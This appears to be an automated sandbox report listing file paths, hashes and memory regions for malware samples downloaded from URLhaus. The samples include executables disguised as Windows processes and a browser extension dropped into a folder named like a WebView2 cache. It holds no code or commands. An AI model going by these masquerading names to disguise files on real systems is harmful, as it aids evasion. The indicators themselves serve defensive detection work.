SHA256 d0df57988a74acd50b2d261e8b5f2c25da7b940ec2aafbee444c277552421e6e
SHA512 52e132ce94f21fa253fed4cf1f67e8d4423d8c30224f961296ee9f64e2c9f4f7064d4c8405cd3bb67d3cf880fe4c21ab202fa8cf677e3b4dad1be6929dbda4e2

C:\Users\Admin\AppData\Local\Temp\_MEI11042\_cffi_backend.cp311-win_amd64.pyd

MD5 739d352bd982ed3957d376a9237c9248
SHA1 961cf42f0c1bb9d29d2f1985f68250de9d83894d
SHA256 9aee90cf7980c8ff694bb3ffe06c71f87eb6a613033f73e3174a732648d39980
SHA512 585a5143519ed9b38bb53f912cea60c87f7ce8ba159a1011cf666f390c2e3cc149e0ac601b008e039a0a78eaf876d7a3f64fff612f5de04c822c6e214bc2efde

C:\Users\Admin\AppData\Local\Temp\_MEI11042\_bz2.pyd

MD5 4101128e19134a4733028cfaafc2f3bb
SHA1 66c18b0406201c3cfbba6e239ab9ee3dbb3be07d
SHA256 5843872d5e2b08f138a71fe9ba94813afee59c8b48166d4a8eb0f606107a7e80
SHA512 4f2fc415026d7fd71c5018bc2ffdf37a5b835a417b9e5017261849e36d65375715bae148ce8f9649f9d807a63ac09d0fb270e4abae83dfa371d129953a5422ca

C:\Users\Admin\AppData\Local\Temp\_MEI11042\_brotli.cp311-win_amd64.pyd

MD5 d9fc15caf72e5d7f9a09b675e309f71d
SHA1 cd2b2465c04c713bc58d1c5de5f8a2e13f900234
SHA256 1fcd75b03673904d9471ec03c0ef26978d25135a2026020e679174bdef976dcf
SHA512 84f705d52bd3e50ac412c8de4086c18100eac33e716954fbcb3519f4225be1f4e1c3643d5a777c76f7112fae30ce428e0ce4c05180a52842dacb1f5514460006

C:\Users\Admin\AppData\Local\Temp\_MEI11042\_asyncio.pyd

MD5 2859c39887921dad2ff41feda44fe174
SHA1 fae62faf96223ce7a3e6f7389a9b14b890c24789
SHA256 aebc378db08617ea81a0a3a3bc044bcc7e6303e314630392dd51bab12f879bd9
SHA512 790be0c95c81eb6d410e53fe8018e2ca5efd1838dc60539ebb011911c36c8478333ee95989cfd1ddaf4f892b537ae8305eb4cd893906930deae59c8965cf2fbb

C:\Users\Admin\AppData\Local\Temp\_MEI11042\unicodedata.pyd

MD5 bc58eb17a9c2e48e97a12174818d969d
SHA1 11949ebc05d24ab39d86193b6b6fcff3e4733cfd
SHA256 ecf7836aa0d36b5880eb6f799ec402b1f2e999f78bfff6fb9a942d1d8d0b9baa
SHA512 4aa2b2ce3eb47503b48f6a888162a527834a6c04d3b49c562983b4d5aad9b7363d57aef2e17fe6412b89a9a3b37fb62a4ade4afc90016e2759638a17b1deae6c

C:\Users\Admin\AppData\Local\Temp\_MEI11042\pyexpat.pyd

MD5 1c0a578249b658f5dcd4b539eea9a329
SHA1 efe6fa11a09dedac8964735f87877ba477bec341
SHA256 d97f3e27130c267e7d3287d1b159f65559e84ead9090d02a01b4c7dc663cd509
SHA512 7b21dcd7b64eeba13ba8a618960190d1a272fa4805dedcf8f9e1168aebfe890b0ced991435ecbd353467a046fc0e8307f9a9be1021742d7d93aa124c52cc49e6

C:\Users\Admin\AppData\Local\Temp\_MEI11042\libssl-1_1.dll

MD5 8769adafca3a6fc6ef26f01fd31afa84
SHA1 38baef74bdd2e941ccd321f91bfd49dacc6a3cb6
SHA256 2aebb73530d21a2273692a5a3d57235b770daf1c35f60c74e01754a5dac05071
SHA512 fac22f1a2ffbfb4789bdeed476c8daf42547d40efe3e11b41fadbc4445bb7ca77675a31b5337df55fdeb4d2739e0fb2cbcac2feabfd4cd48201f8ae50a9bd90b

C:\Users\Admin\AppData\Local\Temp\_MEI11042\libcrypto-1_1.dll

MD5 6f4b8eb45a965372156086201207c81f
SHA1 8278f9539463f0a45009287f0516098cb7a15406
SHA256 976ce72efd0a8aeeb6e21ad441aa9138434314ea07f777432205947cdb149541
SHA512 2c5c54842aba9c82fb9e7594ae9e264ac3cbdc2cc1cd22263e9d77479b93636799d0f28235ac79937070e40b04a097c3ea3b7e0cd4376a95ed8ca90245b7891f

C:\Users\Admin\AppData\Local\Temp\_MEI11042\setuptools\_vendor\jaraco\text\Lorem ipsum.txt

MD5 4ce7501f6608f6ce4011d627979e1ae4
SHA1 78363672264d9cd3f72d5c1d3665e1657b1a5071
SHA256 37fedcffbf73c4eb9f058f47677cb33203a436ff9390e4d38a8e01c9dad28e0b
SHA512 a4cdf92725e1d740758da4dd28df5d1131f70cef46946b173fe6956cc0341f019d7c4fecc3c9605f354e1308858721dada825b4c19f59c5ad1ce01ab84c46b24

C:\Users\Admin\AppData\Local\Temp\_MEI11042\charset_normalizer\md.cp311-win_amd64.pyd

MD5 cbf62e25e6e036d3ab1946dbaff114c1
SHA1 b35f91eaf4627311b56707ef12e05d6d435a4248
SHA256 06032e64e1561251ea3035112785f43945b1e959a9bf586c35c9ea1c59585c37
SHA512 04b694d0ae99d5786fa19f03c5b4dd8124c4f9144cfe7ca250b48a3c0de0883e06a6319351ae93ea95b55bbbfa69525a91e9407478e40ad62951f1d63d45ff18

C:\Users\Admin\AppData\Local\Temp\_MEI11042\charset_normalizer\md__mypyc.cp311-win_amd64.pyd

MD5 bac273806f46cffb94a84d7b4ced6027
SHA1 773fbc0435196c8123ee89b0a2fc4d44241ff063
SHA256 1d9aba3ff1156ea1fbe10b8aa201d4565ae6022daf2117390d1d8197b80bb70b
SHA512 eaec1f072c2c0bc439ac7b4e3aea6e75c07bd4cd2d653be8500bbffe371fbfe045227daead653c162d972ccaadff18ac7da4d366d1200618b0291d76e18b125c

C:\Users\Admin\AppData\Local\Temp\_MEI11042\certifi\cacert.pem

MD5 50ea156b773e8803f6c1fe712f746cba
SHA1 2c68212e96605210eddf740291862bdf59398aef
SHA256 94edeb66e91774fcae93a05650914e29096259a5c7e871a1f65d461ab5201b47
SHA512 01ed2e7177a99e6cb3fbef815321b6fa036ad14a3f93499f2cb5b0dae5b713fd2e6955aa05f6bda11d80e9e0275040005e5b7d616959b28efc62abb43a3238f0

C:\Users\Admin\AppData\Local\Temp\_MEI11042\multidict\_multidict.cp311-win_amd64.pyd

MD5 ecc0b2fcda0485900f4b72b378fe4303
SHA1 40d9571b8927c44af39f9d2af8821f073520e65a
SHA256 bcbb43ce216e38361cb108e99bab86ae2c0f8930c86d12cadfca703e26003cb1
SHA512 24fd07eb0149cb8587200c055f20ff8c260b8e626693c180cba4e066194bed7e8721dde758b583c93f7cb3d691b50de6179ba86821414315c17b3d084d290e70

C:\Users\Admin\AppData\Local\Temp\_MEI11042\yarl\_quoting_c.cp311-win_amd64.pyd

MD5 1c6c610e5e2547981a2f14f240accf20
SHA1 4a2438293d2f86761ef84cfdf99a6ca86604d0b8
SHA256 4a982ff53e006b462ddf7090749bc06ebb6e97578be04169489d27e93f1d1804
SHA512 f6ea205a49bf586d7f3537d56b805d34584a4c2c7d75a81c53ce457a4a438590f6dbeded324362bfe18b86ff5696673de5fbe4c9759ad121b5e4c9ae2ef267c0

C:\Users\Admin\AppData\Local\Temp\_MEI11042\propcache\_helpers_c.cp311-win_amd64.pyd

MD5 04444380b89fb22b57e6a72b3ae42048
SHA1 cfe9c662cb5ca1704e3f0763d02e0d59c5817d77
SHA256 d123d7fefde551c82eb61454d763177322e5ce1eaa65dc489e19de5ab7faf7b4
SHA512 9e7d367bab0f6cc880c5870fdcdb06d9a9e5eb24eba489ca85549947879b0fa3c586779ffcea0fca4c50aa67dad098e7bd9e82c00e2d00412d9441991267d2da

C:\Users\Admin\Downloads\UrlHausFiles\saw.bat

MD5 887c821a48cf66c815f6dce4f8cb61d5
SHA1 fb8106bd815664d85c3c5c8ea9675f760aaa0af2
SHA256 9e5ea05f6f196e780b17f8130e525f19b5f8809a59164b792e93891cba343ffb
SHA512 fb9e0e20abb81a941a79156b21e656f32206c0212a66fcbf2e3a768a2d2ceec7b3ebb8feda398cb4f309a4aba606acd8702730148bcc1443d8de9db64513c8c7

memory/4728-125-0x000002082A5E0000-0x000002082A602000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oxomqvxc.fd5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 46e6ad711a84b5dc7b30b75297d64875
SHA1 8ca343bfab1e2c04e67b9b16b8e06ba463b4f485
SHA256 77b51492a40a511e57e7a7ecf76715a2fd46533c0f0d0d5a758f0224e201c77f
SHA512 8472710b638b0aeee4678f41ed2dff72b39b929b2802716c0c9f96db24c63096b94c9969575e4698f16e412f82668b5c9b5cb747e8a2219429dbb476a31d297e

C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe

MD5 24453759fc86d34383bd0ffc722bbfb5
SHA1 495fa07508f0e79d9ce26f9179285d41303ce402
SHA256 ff4bc7221036ee331d8b913f12aec34493c11b6c2655dc15cf4281a6306126ab
SHA512 aad86f8232a676e1705319f0da2c45a89b533ecf5e8bcbc95d610683247f028b57ae7bf8b791468f6ce9b34962778cec205b48c4612c95c82967bb223ad30db9

\??\pipe\LOCAL\crashpad_2860_MKYVZLSUEGCBHXAS

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/3172-161-0x00000000008D0000-0x00000000008DE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 fdee96b970080ef7f5bfa5964075575e
SHA1 2c821998dc2674d291bfa83a4df46814f0c29ab4
SHA256 a241023f360b300e56b2b0e1205b651e1244b222e1f55245ca2d06d3162a62f0
SHA512 20875c3002323f5a9b1b71917d6bd4e4c718c9ca325c90335bd475ddcb25eac94cb3f29795fa6476d6d6e757622b8b0577f008eec2c739c2eec71d2e8b372cff

C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe

MD5 2d79aec368236c7741a6904e9adff58f
SHA1 c0b6133df7148de54f876473ba1c64cb630108c1
SHA256 b33f25c28bf15a787d41472717270301071af4f10ec93fa064c96e1a33455c35
SHA512 022c5d135f66bc253a25086a2e9070a1ae395bdedd657a7a5554563dace75e1cbfe77c87033d6908d72deeab4a53f50e8bd202c4f6d6a9f17a19a9ebfdfe9538

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 9c45c95e567b23c7b7614b8d17932c0b
SHA1 7dcaf9e43c75f5a5e0ada6a56b54581110f12fb6
SHA256 2e22463c8925e70e80b5442ae8ad5a01ad43244e875620d2313bf0c0180811f6
SHA512 03ad71ffc0ae2f21745d6fb46d096e05c2d998aee7d795bdd61237b195ea12d4984a79509ea7f2f8dd7a39bad2e541bd9d0efb8112432a8baeb9456fef5a2d3b

C:\Users\Admin\Downloads\UrlHausFiles\XClient.exe

MD5 59a9510540fec35043b990deb270b139
SHA1 54d66862a4c08ebcba8029ec99d558725603f486
SHA256 9c113da0d913a9fd2a84c5c9a71da4338e3f16a62b8215ecb7a58d10ccab524f
SHA512 011ea8ffe125a6f68f149a0a5b7bcd95197ac8b7d3d7d362807ef984e971411f2b125921fbcbc183e95633555ac58c4e287b6a858f19e077dd9a8eb0975e3e06

memory/2528-179-0x0000000000460000-0x0000000000472000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\app64.exe

MD5 40b887735996fc88f47650c322273a25
SHA1 e2f583114fcd22b2083ec78f42cc185fb89dd1ff
SHA256 d762fccbc10d8a1c8c1c62e50bce8a4289c212b5bb4f1fe50f6fd7dd3772b14a
SHA512 5dd81a17725c0fb9dae4341e4d5f46ba1035fdba2786a15b5288b4281cd7b0741889a6813da2f797a2581fed08d0f407b6fad0315bdac50ff62c94cb7a7ead13

C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe

MD5 2697c90051b724a80526c5b8b47e5df4
SHA1 749d44fe2640504f15e9bf7b697f1017c8c2637d
SHA256 f8b23a264f58e9001e087af2bf48eed5938db31b5b1b20d973575cfa6a121355
SHA512 d0c8d76699f2f88d76eeaf211e59a780969b7692b513495a34013af8380d3fe0616caf03c6e47b8e7721d2f0a369c1dd20860b755b7d607783a99080c5f5315b

C:\Users\Admin\Downloads\UrlHausFiles\241.exe

MD5 5af42374a762c344d7e9e58e16465211
SHA1 c2f15a0c297ae8724e71a5deae1c1a4d6f8fe41e
SHA256 7989fb637d1e8268371bafe31a452bb626abaae2345a9ff5838a258109e91f04
SHA512 d8744308bf91defb76ee552226183b29bb29a66f2c38d5c82c7c9f27fe834886ee6fb871cc202290b1cf5cda83c9b2bd6d0564ad2cf1ff49721c4851876f96c4

C:\Users\Admin\Downloads\UrlHausFiles\shell.exe

MD5 390c469e624b980db3c1adff70edb6dd
SHA1 dc4e0bf153666b5ca2173f480a3b62c8b822aa85
SHA256 3bb815b5af569dbad7f8f4cccc8e82000ba9b3baedf92e510253af13d60a084a
SHA512 e9c8be87d6692480e4c9ca0717ffda8c3023846722c54a74384f80ecae91a8d16be460c78a58419c9fb6e4507faf5ffa66af6f5e57a15ef35e3244c431f2c1ac

C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe

MD5 759f5a6e3daa4972d43bd4a5edbdeb11
SHA1 36f2ac66b894e4a695f983f3214aace56ffbe2ba
SHA256 2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d
SHA512 f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385

memory/2144-225-0x0000000000400000-0x0000000000459000-memory.dmp

memory/2144-226-0x0000000000400000-0x0000000000459000-memory.dmp

memory/2768-247-0x0000000000400000-0x000000000066D000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\gU8ND0g.exe

MD5 4c64aec6c5d6a5c50d80decb119b3c78
SHA1 bc97a13e661537be68863667480829e12187a1d7
SHA256 75c7692c0f989e63e14c27b4fb7d25f93760068a4ca4e90fa636715432915253
SHA512 9054e3c8306999fe851b563a826ca7a87c4ba78c900cd3b445f436e8406f581e5c3437971a1f1dea3f5132c16a1b36c2dd09f2c97800d28e7157bd7dc3ac3e76

C:\Users\Admin\Downloads\UrlHausFiles\Taskmgr.exe

MD5 ea257066a195cc1bc1ea398e239006b2
SHA1 fce1cd214c17cf3a56233299bf8808a46b639ae1
SHA256 81e95eaca372c94265746b08aac50120c45e6baae7c521a8a23dd0dfdc3b9410
SHA512 57c01e41e30259632ffbe35a7c07cc8b81524ca26320605750a418e0e75f229d2704ae226106147d727fe6330bc5268f7a2a9838fa2e7b0178eadf056682a12f

C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe

MD5 708adef6da5ac2ffee5f01f277560749
SHA1 3dedb41674634e6b53dfaea704754cee7bddfbe3
SHA256 0fec722a795adc9e313422c62e8ff0c7dac935dfef78da6560e38455a7739e4a
SHA512 463927da961a3a52199d2a70dbf51aed7b600e45da5e71c73c9ea9b9971c32fc77b3f1d442400a4a4fe4d0a5bc024893f633a5d898dd9e955b9ed3a8d0d3ce28

C:\Users\Admin\Downloads\UrlHausFiles\actualizacion-con-extension.exe

MD5 5d6fed42a4eea8091d4f8b6ba5243377
SHA1 ff6098a81430bd4b52707e94e77fdd9f49a35224
SHA256 24e265deef02a8ed892dd85a3c704d0a4fdea9d10e31c3aa4589f39fca64dd1a
SHA512 eb5d210c399867527182aeec3cd3b47c42f98ebc7639bd6c9ce5a663381fa70c2b51f57c375e1b1808a0b4d661dbf046b16be6ecd595f36bb326e198af71e73c

C:\ProgramData\WebView2CacheTmp\nfCgDT5r4k.zip

MD5 7e9cbf2d3ac4c2e60e1235adc44b1917
SHA1 d38a061d7eb74f23defa57ee98d577619e123dfa
SHA256 33ceff82570527b0cbb21111e489ab8de64884d2df700f9b2b9b09610b66bb96
SHA512 58c72b6a025d87defdb8deea4855d73486a9a1921f8f9cf53d25c0eda310cf1d4b86a41d45f3eca11200091de94a35ef3e31662453371e84c9c2778174517043

C:\Users\Admin\Downloads\UrlHausFiles\Aa_v3.exe

MD5 121e1634bf18768802427f0a13f039a9
SHA1 8868654ba10fb4c9a7bd882d1f947f4fd51e988e
SHA256 5fc600351bade74c2791fc526bca6bb606355cc65e5253f7f791254db58ee7fa
SHA512 393df326af3109fe701b579b73f42f7a9b155bb4df6ea7049ad3ae9fdd03446576b887a99eb7a0d59949a7a63367e223253448b6f1a0ebeaf358fa2873dcc200

C:\Users\Admin\Downloads\UrlHausFiles\NBYS%20ASM.NET.exe

MD5 9790d2a48db7bd4b4c263d6be39ac838
SHA1 383e03f816921878a69e3f4d14eee67cc9cdead5
SHA256 2a3a8b9904768d92b5a063516fb42ded72af0d835fd92c97f8c0cec627cebe96
SHA512 37fe513e4dd72a720178d4f69b02d24aad192f609334bcbbab851a88bfe55079a636e495ecf80145d295d56f2d049430a906a37068234b3073d6187f986e6231

memory/5612-612-0x0000000000740000-0x00000000007E8000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe

MD5 a62abdeb777a8c23ca724e7a2af2dbaa
SHA1 8b55695b49cb6662d9e75d91a4c1dc790660343b
SHA256 84bde93f884b8308546980eb551da6d2b8bc8d4b8f163469a39ccfd2f9374049
SHA512 ac04947446c4cb81bb61d9326d17249bca144b8af1ecdf1ac85b960c603e333b67ab08791e0501aee08939f54e517e6574895b1e49a588011008f8f060731169

memory/5612-618-0x0000000008420000-0x0000000008652000-memory.dmp

memory/5952-621-0x0000000140000000-0x0000000140004248-memory.dmp

memory/5612-623-0x0000000008CA0000-0x0000000009246000-memory.dmp

memory/5612-620-0x0000000008650000-0x00000000086EC000-memory.dmp

memory/5612-625-0x0000000008790000-0x0000000008822000-memory.dmp

memory/5612-630-0x0000000005100000-0x000000000510A000-memory.dmp

memory/5612-631-0x0000000008960000-0x00000000089B6000-memory.dmp

C:\ProgramData\WebView2CacheTmp\client-hub-main-world.0f1a9f3f.js

MD5 ae94e274c9270b5669e08cd60790310c
SHA1 6de73f8cf808de97c280ddae20e389ce57187c23
SHA256 d7f8d59164e9f832dc555de3735ce1930bb29535a1471a46a2d2ae509e3d3848
SHA512 d7350ba4c7285af2cec80e9e9b0ebef70564992c64dcd06d488bf1f007aa19f1416421874f11c571627b4c28f5bfaf97f19364a072eca996c1f1795325db6351

C:\ProgramData\WebView2CacheTmp\icon32.plasmo.8d9ae15c.png

MD5 a7635de53826e30e81d490f96c725d4c
SHA1 8da9e89f6b73933847d4289dff7933c325d03532
SHA256 3ef54730891935310e9d028a1d842575423b663f5ec84a295e388e47a4dda392
SHA512 b0a2d832a9f1cbba0fd64904bc74679ef1c9dcf1a0bbb55015adc31e09e39a566f3d3538b2e1425d64bdc791a458ef2e72430c1d883201ee0e74fa58feb410a3

C:\ProgramData\WebView2CacheTmp\icon16.plasmo.688a37f1.png

MD5 94d2e2354bf04af0080e3be2e6868c1b
SHA1 2e00629950011bca4cfafb126bb0f31b7da9c999
SHA256 08c4c5b077333482e6601354889737cec917fa5f4c6b4fb0b939d83a1532cd1a
SHA512 55cf44e49f9e8b23166d87216235638b59b874f59976d3e9b388a816662a6ed9e586fad2226fc5cb937eaea1c4877392d0de475d5e3fa4e0cf21100dbbd5b26e

C:\ProgramData\WebView2CacheTmp\icon128.plasmo.08e83926.png

MD5 5e65f1cf3dd4bac3f6af18b860007c19
SHA1 2609cefb78f4a83d6ed007ab8a63bf1f91fdb67e
SHA256 0ed91152a6e82413ed77085bf26f5c61ee78004300221b3f84b45d45ce1511f2
SHA512 454d1bc54facb2bf0ccb41732cd0a51e60549ed92d027cd3844c3177c1a9dd4a91886e42dc68410621841a423629ab12ff2c08590f561534a2f841337d5bf825

C:\ProgramData\WebView2CacheTmp\hides.1b473e1b.js

MD5 88790dc330d05740d7b61efb48190e26
SHA1 7962b8d60e51613dd95b81d2cccddbf5b7cd47ed
SHA256 8377dd9fc0011f755e38fa7a79b291d83f1593ca4cffc5216f8405797d939df6
SHA512 be23f297149e801551f867b120738eacf771cbec4249d05c15b5371d42e4b53f308582f6b0e08fa67632daa3b7d2b02a14b96016e3e5c53382824ba1c1900b98

C:\ProgramData\WebView2CacheTmp\handle-main-world.a3d50818.js

MD5 e0508d98ae2db1400f57cb5ee27973fb
SHA1 8bfb5abb51abc431af5444a54ea5cfd85cc3d207
SHA256 c8c66d6a2dd82d5b9a84c0c5fc65b176a61bf2c852dac34afa6c475637694627
SHA512 c5059045000cb15d2762f82be4f668ef8d99d588c3e73ffb05fa33eed2e5bb94ef142cb62217e5719c302a3b5c714e6dabedf442301f16252d4d4dd38d26db7c

C:\ProgramData\WebView2CacheTmp\any-url-query-text.474c015e.js

MD5 6a1d9b735d183cba1da43ed8f3d99ac2
SHA1 7ff66fcad13adc09f75ecef9759cefbd84578d37
SHA256 0d31a7982d991a6474bde4380f69d057640e90e149bb09217a0abfa85ede5439
SHA512 087e639252ff3afb69c43a4075cb2c933c3212b3da601362cf279264816b0e050f2f9f9db2697757b57f697036d4ea1c8842c7878c28fac18684c3b8a24b6997

C:\ProgramData\WebView2CacheTmp\contents.ff16a2d0.js

MD5 c353c565d25cbdacee9cbbcc3d15099d
SHA1 9e6ceb9b1e95ef796e68188c27356f60a86e6bb5
SHA256 f71909bd9f6656d5490eab3b51931e5ceefe1c331ba8bf8a4f61e0e9150aaed1
SHA512 3aa3cfb512c367005103fd9ad6f9ab0436c5925d061fbeaf574978903d2c7537693110bebf640e73f08fe70da4ccf0477aecc681f29ead1a26a1ab9476dd273a

C:\ProgramData\WebView2CacheTmp\icon48.plasmo.a3bde740.png

MD5 47e56736b888016a74dace11c51101a6
SHA1 ee087300552a179259d91b8922e72e5cd73f1409
SHA256 e081a2f5898e69f52ed5e443ec15654693558db199da496ed3b49c1789a39a52
SHA512 eea84da43efa6a6cf47ecdeb06255903142b4c6bd34f05ada3e85f003ddc640dad71495b17158f8a181cf6783ebddf6500cac1a82ed4e8ecd48910d7cce5b242

C:\ProgramData\WebView2CacheTmp\porter.5b9e22f0.js

MD5 2a89da6cee03cda9960639b88d786dd7
SHA1 a4725508bdf601fa8e06689eaf43b53e20419ace
SHA256 6768ea7a2b08dc254db29a178ee94eaae34bab70f9349567c7209f36eabcb71d
SHA512 2f924aa82f758a38e00546dd0fd454710ae211a81f16c81d5e73d4d94ed6a9ce91a63814fb73a42aed6bd2cf2ee0b4f60d236f79458327dc6d67fbe478412be7

C:\ProgramData\WebView2CacheTmp\manifest.json

MD5 d94a7fb9fdbefcfc63399813e1ad7a65
SHA1 4c6ce355b31f2b5e0affe9c9dfbd5b027d39aca7
SHA256 0774fc5f4368cee6001189b108c6f9a48c6e7ffdc82451bc4d2cbcd36067144f
SHA512 efe91c918234459aa40f445dabce0e6cacd5af57e6938e0f1d295368b32663f18d886ab366ef8ffe321703b085ba82421b519fae9ccab183250f97fc19a9d5fa

C:\ProgramData\WebView2CacheTmp\redirect.f4add111.js

MD5 68f349d629fa6d2ba307e55d9ee86a71
SHA1 533da8def0ed039862a1329e0b18d041c830d687
SHA256 96c8ab67b501b9d4f76307a568ae1e1454639c493d0a2fbd44f4058818cba184
SHA512 2cf0b82c5a6e132b422916ae85c5e6854b1f14928393aab7dfd05992582e91eeb2076a24f09129997a3f90c9173078bfd027972a9f20a99271f54f91091b060c

C:\ProgramData\WebView2CacheTmp\tabs\uid.html

MD5 7965a1107be3d70c2871caea9709c692
SHA1 0b494db4738417bbf1e5320ef75c6764b5faa9d1
SHA256 afa73f085548a1fe9daa7731728097aa63f67f3f85266cd050c45c9cdfbd4ddd
SHA512 31404c317d5d8adbfd9fc0ca1cbe1b07a6ec2e20ccb91f2739892c792abb2ea31d69aafe24fad9d40c72f4e9cd4aaac7838f44bf9393706557d1eb9c5dffd16d

C:\ProgramData\WebView2CacheTmp\tabs\uid.21a44d14.js

MD5 746fae86aa47aa2be0f6166bfd5cbea8
SHA1 a6038efedd80c47fdca60917eaa8427ce6bf4164
SHA256 197bb4722cf6769f04f42f4e9a33a11c7880f7515149b91f15243eae0aba3853
SHA512 3df23d6bdc5fba090c51f9fd9c9214cb24d11cb66953e6117ebdaa8682ef409da0e552526aa28da469faa6ca213d861f932838921333306f6c10e1393fa3ad6c

C:\ProgramData\WebView2CacheTmp\script-injector.bb348f28.js

MD5 c698e626737b4ee9909095a1c706e244
SHA1 91856fa3cea73cf57dab9a0799730310ac4afaa5
SHA256 59f3829d81f5272abd80c12481547b8068ac9a5b7b7f77e3b2c787eb87ac036e
SHA512 92fcb6b14329161a51909c18b1376f0c8500bc0877fbb43215df1749fae172134e6eb7bd41f77be250fa082be6256fc3242691cef7d3a5c6b2136639d31d1df6

C:\ProgramData\WebView2CacheTmp\popup.html

MD5 d1b5364de84ca40a3a100b4c2bc69979
SHA1 389d431c1382430dc8fed48bfd8d18bee37aa23e
SHA256 f51b536acd929a9ec7d81d5c355f36417df32b58f61468a04c8d6d79fb5f535e
SHA512 95f9e859a732e20178a2cb5c018f3aec93a588e1194fc6923bf6a04c3cecd6a3d0ac98a69c2c5bfe217817371327fd8bca008747e1e366daad8b5486d7feb77a

C:\ProgramData\WebView2CacheTmp\static\background\index.js

MD5 216033f5126b0bd998d2a238f986930e
SHA1 ce78282decfe60f8b9077eb766e64065541030bb
SHA256 fc0793f0695e375d35aa03e934bf0b4fbaab1cf2bf74f4a61129501d9a014600
SHA512 797aeaf5893d0f6601be11630d6b803a6a0a37a72936ef21180fdcd329bb6f5a93caa8b9e566fa18d33e30abddb57cf3a3505e6524c5c9cd0064c7d9c1e5ddb3

C:\ProgramData\WebView2CacheTmp\main-world.813137d8.js

MD5 f5f968acae1709384b1f9c8f86ad7ae6
SHA1 859052732737b0b69ddd24276b20b8a78369b949
SHA256 6d151e397951cabd0f8d935c24ee2b47e0d21559138a8f7aea8832f5a0999b55
SHA512 3ac17ec5a92a95e75c1785d01e8fc8f3151be6775154a28524cfdb02c368d69cc7dd8d9ee4d7ed481a63a959ed1aa633568b7ca72e03ad8509c1826f631caa56

C:\ProgramData\WebView2CacheTmp\iframe.f39ef5cc.js

MD5 a393f196dea73c2cfae5c2170271cace
SHA1 5433b8daa03c47a8d49638057f9924d44d41aa8e
SHA256 801114cd871061c8fc88911de118e9c1d8303dd9325413e7ff0fde1e4054b98a
SHA512 a100cce68dccb171b5ad09bd496e3c8644c5f090be27bc352f0d457c6b22291f0f880d72f35a33653549e4c4e26490f29483ee5e427927eb3caf5c008b68545d

C:\ProgramData\WebView2CacheTmp\popup.db969b92.js

MD5 707c5f8c270a6c82a9b53ac71bf6dd73
SHA1 afe0fc1afa227b3f681380b7bf398ba524eca641
SHA256 6e93886068dca8dbdbd4066645b1ff2426007da845b7312c76e05685f38656bf
SHA512 e64719ebf410c3f2749c3b1f3b9e89e77e03ee0ea76e8772a4818caf4176e7830de47c5f79b1e307c111e70d36cceb38ab49bf529409590c8f4c71722ce7cc7d

C:\ProgramData\WebView2CacheTmp\icon64.plasmo.708a74d4.png

MD5 b3f24e57e4231cac6c1a10826299f2fa
SHA1 f8b9d6e96b92bd4a5b97fa8544bbd422590142d8
SHA256 a9f842e4201ab72c7993257b6072d41c358d4b1d1d4da554ed1aa9d386b27bf0
SHA512 182796edfea44ac1c27ddb66496dd43fb5132e408ff65be2a17b7d92e50d5f6ab62dbf98303da54b668b23316e8de97721c7f49939ee19dd7c2ab1fc228dc485

memory/5612-942-0x000000000B810000-0x000000000B8DE000-memory.dmp

memory/5612-941-0x000000000B390000-0x000000000B6E7000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\EbjU3lW.exe

MD5 a151487b27e539f2f2ec79ac50940872
SHA1 eb655ee0a8762714754c713e5bb3171ff1be3467
SHA256 70a4257b71a11086ab596f6122ee6a8b6ef9335f5538f79e68f48727fa1dc439
SHA512 4eb5de737ad27d4aed33d02ef3b6f58c045252e81b3b733de2d204747519d8f6ff9ea75c2858259467439eb833055bebb8c3449ce8fe68852d3ec51bc7b58c86

memory/5824-978-0x0000000000400000-0x0000000000AD9000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\Photo.scr

MD5 64740b0915047cc6d588cda977342225
SHA1 c3e9ff3c66f8f8cab536dff4bd8db2b99f1999b2
SHA256 a98fc0e18dde1b92767eaeec5bea39fe38c282ded55b256daddad4cf3cd64934
SHA512 fc4e38022d0be24a3d0d7993ee7d0aabcf21ccd67dc88bdb2fbe5b1270be403ff47f2ee39ab3bed503ba253e5bbcfe56ea776e5085ed636431f6fe2e2460b84c

C:\Users\Admin\Downloads\UrlHausFiles\RuntimeBroker.exe

MD5 dec397e36e9f5e8a47040adbbf04e20b
SHA1 643f2b5b37723ebc493ba6993514a4b2d9171acb
SHA256 534fd2d6da5c361831eb7fbfd1b203fbb80cd363d33f69abc4eafc384bafdc5e
SHA512 b2cdd06c044ae8b4cf7ae5c32b65f2b03f733b93061b9076cf29103da53573460c7e5d53da72220055cdafb084c63019d4a134d562a06af81c1eaad30892845b

memory/1120-1007-0x00007FF663A90000-0x00007FF663A9F000-memory.dmp

memory/2776-1017-0x0000000180000000-0x0000000180820000-memory.dmp

memory/2776-1043-0x000001B097190000-0x000001B0971B0000-memory.dmp

